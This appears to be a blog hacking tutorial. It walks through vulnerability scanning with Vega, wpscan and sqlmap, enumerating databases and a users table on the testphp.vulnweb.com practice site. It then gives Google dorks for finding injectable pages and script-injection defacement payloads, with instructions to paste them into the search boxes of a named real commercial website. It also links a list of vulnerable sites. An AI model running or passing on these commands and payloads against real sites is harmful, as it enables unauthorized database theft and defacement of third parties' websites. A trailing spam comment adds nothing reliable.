A post to make you alive again, with some cool steps you can take a website down.
Disclaimer : This post is for practice purpose only. Using this tricks without proper consent is illegal and it's your responsibility to obey all the law. We are not responsible for any misuse or damage cause by this tutorial.
Practice Web Site : testphp.vulnweb.com/listproducts.php?cat=1
Starting with scanning for vulnerability -
- Set up Kali Linux in a Partition or in Virtual Machine.
- Open up : Application > Kali Linux > Web Application > Web Vulnerability Scanner > VEGA
// I hope you didn't have problem in doing that.
- So, see step by step after opening VEGA tool
After opening it - Go To Scan > Start New Scan
Enter the Web address, you can explore further if you like to otherwise just click on finish.
Remember, you can search for vulnerability on any webpage or site. Some sites also prizes you bounty on exploring bug and reporting to them ;)
The scan will take place. You can see the hierarchy in website view.
Now, BOOOOMMMM...
You've got
XSS - 1
SQL - 1
Which we are going to use.
Information of WPSCAN :
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
Used to scan Wordpress hosted websites. Can be use to enumerate user or database or tables from :
wpscan --url www.cheaphai.com --enumerate u
You can explore more by using --help in wpscan.rb
Using SQLMAP to exploit a SQL Injection Vulnerable website
Opening a vulnerable website
http://testphp.vulnweb.com/listproducts.php?cat=1
doesn't creates much problem and looks like yellow gold but who knows
a " ' " can turn that gold in shit. (both are yellow though)
So, you've identified it lamely, that it is a vulnerable site. Much of talks till here.Now time for some action :
Paste it in terminal
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
here "--dbs" will enumerate the list of databases.
Could you see in the last line available databases :
[1] acuart
[2] information_schema
let's check the tables in 'acuart' -
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
Whoa!!
That was quick.
Now think, how can you enumerate PASSWORDS ;)
Time for XSS : Cross Site Scripting :
Cross Site Scripting is nothing but an vulnerability which can perform some serious problem to website like :
So, thats an example.
If you know how to write a javascript you can do anything with XSS.
now, use Google Dork by typing these in Search Box :
inurl:item_id= | inurl:review.php?id= | |||||||
inurl:newsid= | inurl:iniziativa.php?in= | |||||||
inurl:trainers.php?id= | inurl:curriculum.php?id= | |||||||
inurl:news-full.php?id= | inurl:labels.php?id= | |||||||
inurl:news_display.php?getid= | inurl:story.php?id= | |||||||
inurl:index2.php?option= | inurl:look.php?ID= | |||||||
inurl:readnews.php?id= | inurl:newsone.php?id= | |||||||
inurl:top10.php?cat= | inurl:aboutbook.php?id= |
Literally, there are a lot of queries you can searc.
So, Go to these pages
http://testphp.vulnweb.com/search.php
http://www.chauvetlighting.com/
write 1 of below SCRIPT in their search boxes and see the magic
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1>Tutorial by - CS BEANS</h1></div>";</script>
<script>document.body.innerHTML="<style>body{ background-image:url('http://www.connectedrogers.ca/wp-content/uploads/2013/11/DespicableMe.jpg');}</style>";</script>
For Bonus :
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
Open Paste bin here to get list of vulnerable website : http://pastebin.com/xd9Vxyn9
Now go and create your own script and check them out.
learn math in easy way by just visiting the site..
ReplyDeletetrig identeties